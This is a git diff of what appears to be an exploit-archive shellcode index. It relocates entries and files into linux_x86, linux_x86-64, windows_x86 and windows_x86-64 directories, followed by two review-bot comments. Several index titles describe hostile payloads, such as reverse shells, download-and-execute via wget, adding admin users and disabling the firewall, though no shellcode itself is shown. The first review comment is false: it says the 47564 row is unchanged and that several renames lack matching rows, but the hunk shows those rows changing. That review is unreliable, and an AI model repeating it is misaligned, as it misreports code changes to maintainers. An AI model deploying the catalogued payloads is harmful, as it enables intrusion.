@@ -18,7 +18,7 @@ id,file,description,date,author,type,platform 13257,shellcodes/bsdi_x86/13257.c,"BSDi/x86 - execve(/bin/sh) Shellcode (45 bytes)",2004-09-26,duke,shellcode,bsdi_x86 13258,shellcodes/bsdi_x86/13258.c,"BSDi/x86 - execve(/bin/sh) Shellcode (46 bytes)",2004-09-26,vade79,shellcode,bsdi_x86 13260,shellcodes/bsdi_x86/13260.c,"BSDi/x86 - execve(/bin/sh) + ToUpper Encoded Shellcode (97 bytes)",2004-09-26,anonymous,shellcode,bsdi_x86 -13261,shellcodes/freebsd/13261.c,"FreeBSD x86 / x64 - execve(/bin/sh) Anti-Debugging Shellcode (140 bytes)",2009-04-13,c0d3_z3r0,shellcode,freebsd +13261,shellcodes/freebsd/13261.c,"FreeBSD x86/x64 - execve(/bin/sh) Anti-Debugging Shellcode (140 bytes)",2009-04-13,c0d3_z3r0,shellcode,freebsd 13262,shellcodes/freebsd_x86/13262.txt,"FreeBSD/x86 - setreuid + execve(pfctl -d) Shellcode (56 bytes)",2008-09-12,suN8Hclf,shellcode,freebsd_x86 13263,shellcodes/freebsd_x86/13263.txt,"FreeBSD/x86 - Reverse (192.168.1.33:8000/TCP) cat /etc/passwd Shellcode (112 bytes)",2008-09-10,suN8Hclf,shellcode,freebsd_x86 13264,shellcodes/freebsd_x86/13264.txt,"FreeBSD/x86 - Kill All Processes Shellcode (12 bytes)",2008-09-09,suN8Hclf,shellcode,freebsd_x86 
@@ -926,11 +926,11 @@ id,file,description,date,author,type,platform 45669,shellcodes/linux_x86/45669.c,"Linux/x86 - execve(/bin/cat /etc/ssh/sshd_config) Shellcode 44 Bytes",2018-10-24,"Goutham Madhwaraj",shellcode,linux_x86 45743,shellcodes/windows_x86-64/45743.c,"Windows/x64 - Remote (Bind TCP) Keylogger Shellcode (864 bytes) (Generator)",2018-10-30,"Roziul Hasan Khan Shifat",shellcode,windows_x86-64 45821,shellcodes/linux_x86/45821.c,"Linux/x86 - Bind (99999/TCP) NetCat Traditional (/bin/nc) Shell (/bin/bash) Shellcode (58 bytes)",2018-11-13,"Javier Tello",shellcode,linux_x86 -45940,shellcodes/linux/45940.nasm,"Linux/x86 - /usr/bin/head -n99 cat etc/passwd Shellcode (61 Bytes)",2018-12-04,Nelis,shellcode,linux +45940,shellcodes/linux_x86/45940.nasm,"Linux/x86 - /usr/bin/head -n99 cat etc/passwd Shellcode (61 Bytes)",2018-12-04,Nelis,shellcode,linux_x86 45943,shellcodes/linux_x86-64/45943.c,"Linux/x64 - Reverse (0.0.0.0:1907/TCP) Shell Shellcode (119 Bytes)",2018-12-04,"Kağan Çapar",shellcode,linux_x86-64 45980,shellcodes/linux_x86/45980.c,"Linux/x86 - Bind (1337/TCP) Ncat (/usr/bin/ncat) Shell (/bin/bash) + Null-Free Shellcode (95 bytes)",2018-12-11,T3jv1l,shellcode,linux_x86 46007,shellcodes/linux_x86-64/46007.c,"Linux/x64 - Disable ASLR Security Shellcode (93 Bytes)",2018-12-19,"Kağan Çapar",shellcode,linux_x86-64 -46039,shellcodes/linux/46039.c,"Linux/x86 - Kill All Processes Shellcode (14 bytes)",2018-12-24,strider,shellcode,linux +46039,shellcodes/linux_x86/46039.c,"Linux/x86 - Kill All Processes Shellcode (14 bytes)",2018-12-24,strider,shellcode,linux_x86 46103,shellcodes/linux_x86/46103.c,"Linux/x86 - execve(/bin/sh -c) + wget (http://127.0.0.1:8080/evilfile) + chmod 777 + execute Shellcode (119 bytes)",2019-01-09,strider,shellcode,linux_x86 46123,shellcodes/generator/46123.py,"Windows/x86 - Download With TFTP And Execute Shellcode (51-60 bytes) (Generator)",2019-01-11,"Semen Alexandrovich Lyhin",shellcode,generator 
46166,shellcodes/linux_x86/46166.c,"Linux/x86 - Bind (4444/TCP) Shell (/bin/sh) Shellcode (100 bytes)",2019-01-15,"Joao Batista",shellcode,linux_x86 
@@ -1004,24 +1004,24 @@ id,file,description,date,author,type,platform 47396,shellcodes/linux_x86/47396.c,"Linux/x86 - Bind TCP (port 43690) Null-Free Shellcode (53 Bytes)",2019-09-17,"Daniel Ortiz",shellcode,linux_x86 47461,shellcodes/linux_x86/47461.c,"Linux/x86 - NOT + XOR-N + Random Encoded /bin/sh Shellcode (132 bytes)",2019-10-04,bolonobolo,shellcode,linux_x86 47473,shellcodes/arm/47473.c,"Linux/ARM - Fork Bomb Shellcode (20 bytes)",2019-10-08,CJHackerz,shellcode,arm -47481,shellcodes/linux/47481.c,"Linux/x86 - Add User to /etc/passwd Shellcode (59 bytes)",2019-10-10,VL43CK,shellcode,linux -47511,shellcodes/linux/47511.c,"Linux/x86 - adduser (User) to /etc/passwd Shellcode (74 bytes)",2019-10-16,bolonobolo,shellcode,linux -47513,shellcodes/linux/47513.c,"Linux/x86 - execve /bin/sh Shellcode (25 bytes)",2019-10-16,bolonobolo,shellcode,linux -47514,shellcodes/linux/47514.c,"Linux/x86 - Reverse Shell NULL free 127.0.0.1:4444 Shellcode (91 bytes)",2019-10-16,bolonobolo,shellcode,linux -47530,shellcodes/linux/47530.txt,"Linux/x86 - execve(/bin/sh) socket reuse Shellcode (42 bytes)",2019-10-22,WangYihang,shellcode,linux -47564,shellcodes/linux/47564.py,"Linux/x86 - (NOT|ROT+8 Encoded) execve(/bin/sh) null-free Shellcode (47 bytes)",2019-10-30,"Daniel Ortiz",shellcode,linux +47481,shellcodes/linux_x86/47481.c,"Linux/x86 - Add User to /etc/passwd Shellcode (59 bytes)",2019-10-10,VL43CK,shellcode,linux_x86 +47511,shellcodes/linux_x86/47511.c,"Linux/x86 - adduser (User) to /etc/passwd Shellcode (74 bytes)",2019-10-16,bolonobolo,shellcode,linux_x86 +47513,shellcodes/linux_x86/47513.c,"Linux/x86 - execve /bin/sh Shellcode (25 bytes)",2019-10-16,bolonobolo,shellcode,linux_x86 +47514,shellcodes/linux_x86/47514.c,"Linux/x86 - Reverse Shell NULL free 127.0.0.1:4444 Shellcode (91 bytes)",2019-10-16,bolonobolo,shellcode,linux_x86 +47530,shellcodes/linux_x86/47530.txt,"Linux/x86 - execve(/bin/sh) socket reuse Shellcode (42 bytes)",2019-10-22,WangYihang,shellcode,linux_x86 
+47564,shellcodes/linux_x86/47564.py,"Linux/x86 - (NOT|ROT+8 Encoded) execve(/bin/sh) null-free Shellcode (47 bytes)",2019-10-30,"Daniel Ortiz",shellcode,linux_x86 47784,shellcodes/linux_x86-64/47784.txt,"Linux/x64 - Reverse TCP Stager Shellcode (188 bytes)",2019-12-17,"Lee Mazzoleni",shellcode,linux_x86-64 -47877,shellcodes/linux/47877.c,"Linux/x86 - Execve() Alphanumeric Shellcode (66 bytes)",2020-01-06,bolonobolo,shellcode,linux -47890,shellcodes/linux/47890.c,"Linux/x86 - Random Bytes Encoder + XOR/SUB/NOT/ROR execve(/bin/sh) Shellcode (114 bytes)",2020-01-08,"Xenofon Vassilakopoulos",shellcode,linux +47877,shellcodes/linux_x86/47877.c,"Linux/x86 - Execve() Alphanumeric Shellcode (66 bytes)",2020-01-06,bolonobolo,shellcode,linux_x86 +47890,shellcodes/linux_x86/47890.c,"Linux/x86 - Random Bytes Encoder + XOR/SUB/NOT/ROR execve(/bin/sh) Shellcode (114 bytes)",2020-01-08,"Xenofon Vassilakopoulos",shellcode,linux_x86 47953,shellcodes/windows/47953.c,"Windows/7 - Screen Lock Shellcode (9 bytes)",2020-01-22,"Saswat Nayak",shellcode,windows -47980,shellcodes/windows/47980.txt,"Windows/x86 - Dynamic Bind Shell + Null-Free Shellcode (571 Bytes)",2020-01-30,boku,shellcode,windows -48032,shellcodes/linux/48032.py,"Linux/x86 - Bind Shell Generator Shellcode (114 bytes)",2020-02-10,boku,shellcode,linux +47980,shellcodes/windows_x86/47980.txt,"Windows/x86 - Dynamic Bind Shell + Null-Free Shellcode (571 Bytes)",2020-01-30,boku,shellcode,windows_x86 +48032,shellcodes/linux_x86/48032.py,"Linux/x86 - Bind Shell Generator Shellcode (114 bytes)",2020-02-10,boku,shellcode,linux_x86 48116,shellcodes/windows_x86/48116.c,"Windows/x86 - Null-Free WinExec Calc.exe Shellcode (195 bytes)",2020-02-24,boku,shellcode,windows_x86 -48229,shellcodes/windows/48229.txt,"Windows/x64 - Dynamic MessageBoxA or MessageBoxW PEB & Import Table Method Shellcode (232 bytes)",2020-03-18,boku,shellcode,windows -48243,shellcodes/linux/48243.txt,"Linux\x86 - 'reboot' polymorphic Shellcode (26 
bytes)",2020-03-23,Upayan,shellcode,linux +48229,shellcodes/windows_x86-64/48229.txt,"Windows/x64 - Dynamic MessageBoxA or MessageBoxW PEB & Import Table Method Shellcode (232 bytes)",2020-03-18,boku,shellcode,windows_x86-64 +48243,shellcodes/linux_x86/48243.txt,"Linux/x86 - 'reboot' polymorphic Shellcode (26 bytes)",2020-03-23,Upayan,shellcode,linux_x86 48252,shellcodes/windows_x86-64/48252.txt,"Windows/x64 - WinExec Add-Admin (ROOT/I@mR00T$) Dynamic Null-Free Shellcode (210 Bytes)",2020-03-25,boku,shellcode,windows_x86-64 -48355,shellcodes/windows/48355.c,"Windows/x86 - MSVCRT System + Dynamic Null-free + Add RDP Admin + Disable Firewall + Enable RDP Shellcode (644 Bytes)",2020-04-21,boku,shellcode,windows -48379,shellcodes/linux/48379.c,"Linux/x64 - Password (P3WP3Wl4ZerZ) + Bind (0.0.0.0:4444/TCP) Shell (/bin/bash) + Null-free Shellcode (272 Bytes)",2020-04-24,boku,shellcode,linux +48355,shellcodes/windows_x86/48355.c,"Windows/x86 - MSVCRT System + Dynamic Null-free + Add RDP Admin + Disable Firewall + Enable RDP Shellcode (644 Bytes)",2020-04-21,boku,shellcode,windows_x86 +48379,shellcodes/linux_x86-64/48379.c,"Linux/x64 - Password (P3WP3Wl4ZerZ) + Bind (0.0.0.0:4444/TCP) Shell (/bin/bash) + Null-free Shellcode (272 Bytes)",2020-04-24,boku,shellcode,linux_x86-64 48585,shellcodes/arm/48585.c,"Linux/ARM - execve /bin/dash Shellcode (32 bytes)",2020-06-15,"Anurag Srivastava",shellcode,arm 48586,shellcodes/arm/48586.c,"Linux/ARM - Bind (0.0.0.0:1337/TCP) Shell (/bin/sh) + Null-Free Shellcode (100 bytes)",2020-06-15,"Anurag Srivastava",shellcode,arm 48592,shellcodes/linux_x86/48592.c,"Linux/x86 - ASLR deactivation polymorphic Shellcode (124 bytes)",2020-06-17,"Xenofon Vassilakopoulos",shellcode,linux_x86 diff --git a/shellcodes/linux/48379.c b/shellcodes/linux_x86-64/48379.c similarity index 100% rename from shellcodes/linux/48379.c rename to shellcodes/linux_x86-64/48379.c 
diff --git a/shellcodes/linux/45940.nasm b/shellcodes/linux_x86/45940.nasm similarity index 100% rename from shellcodes/linux/45940.nasm rename to shellcodes/linux_x86/45940.nasm diff --git a/shellcodes/linux/46039.c b/shellcodes/linux_x86/46039.c similarity index 100% rename from shellcodes/linux/46039.c rename to shellcodes/linux_x86/46039.c diff --git a/shellcodes/linux/47481.c b/shellcodes/linux_x86/47481.c similarity index 100% rename from shellcodes/linux/47481.c rename to shellcodes/linux_x86/47481.c diff --git a/shellcodes/linux/47511.c b/shellcodes/linux_x86/47511.c similarity index 100% rename from shellcodes/linux/47511.c rename to shellcodes/linux_x86/47511.c diff --git a/shellcodes/linux/47513.c b/shellcodes/linux_x86/47513.c similarity index 100% rename from shellcodes/linux/47513.c rename to shellcodes/linux_x86/47513.c diff --git a/shellcodes/linux/47514.c b/shellcodes/linux_x86/47514.c similarity index 100% rename from shellcodes/linux/47514.c rename to shellcodes/linux_x86/47514.c diff --git a/shellcodes/linux/47530.txt b/shellcodes/linux_x86/47530.txt similarity index 100% rename from shellcodes/linux/47530.txt rename to shellcodes/linux_x86/47530.txt diff --git a/shellcodes/linux/47564.py b/shellcodes/linux_x86/47564.py similarity index 100% rename from shellcodes/linux/47564.py rename to shellcodes/linux_x86/47564.py diff --git a/shellcodes/linux/47877.c b/shellcodes/linux_x86/47877.c similarity index 100% rename from shellcodes/linux/47877.c rename to shellcodes/linux_x86/47877.c diff --git a/shellcodes/linux/47890.c b/shellcodes/linux_x86/47890.c similarity index 100% rename from shellcodes/linux/47890.c rename to shellcodes/linux_x86/47890.c diff --git a/shellcodes/linux/48032.py b/shellcodes/linux_x86/48032.py similarity index 100% rename from shellcodes/linux/48032.py rename to shellcodes/linux_x86/48032.py 
diff --git a/shellcodes/linux/48243.txt b/shellcodes/linux_x86/48243.txt similarity index 100% rename from shellcodes/linux/48243.txt rename to shellcodes/linux_x86/48243.txt diff --git a/shellcodes/windows/48229.txt b/shellcodes/windows_x86-64/48229.txt similarity index 100% rename from shellcodes/windows/48229.txt rename to shellcodes/windows_x86-64/48229.txt diff --git a/shellcodes/windows/47980.txt b/shellcodes/windows_x86/47980.txt similarity index 100% rename from shellcodes/windows/47980.txt rename to shellcodes/windows_x86/47980.txt diff --git a/shellcodes/windows/48355.c b/shellcodes/windows_x86/48355.c similarity index 100% rename from shellcodes/windows/48355.c rename to shellcodes/windows_x86/48355.c
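Review bot: the CSV hunk and the rename set do not line up one-to-one, which points at a pre-existing inconsistency in the index. The unchanged context row for 47564 already reads `shellcodes/linux_x86/47564.py`, yet the file is only moved to that path by this patch (`rename from shellcodes/linux/47564.py`), so before this commit the CSV referenced a path that did not exist; the renames for 45940, 46039, 47481, 47511, 47513, 47514 and 47530 likewise have no matching `-`/`+` row pair in the hunk. Suggest adding a pre-commit or CI check that every path column in the CSV resolves to an existing file, so the index and the tree cannot drift apart again. Separately, the 48243 row bundles a title fix (`Linux\x86` becomes `Linux/x86`) with the platform recategorization; that is fine, but the commit message should mention it so the title change is not mistaken for a typo introduced by the move.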
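Review bot: every rename diff is `similarity index 100%` with no content change, so the only record of the new architecture split (`linux` into `linux_x86` and `linux_x86-64`, `windows` into `windows_x86` and `windows_x86-64`) is the directory name together with the CSV platform column. The split itself is applied consistently in what is visible (48379.c, titled "Linux/x64", goes to `linux_x86-64` while the other Linux files go to `linux_x86`; 48229.txt, titled "Windows/x64", goes to `windows_x86-64`), but the commit message states no rule for it. Suggest documenting the convention that the directory name equals the CSV platform column, since any tooling that builds file paths from the CSV now has to match on the new values.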
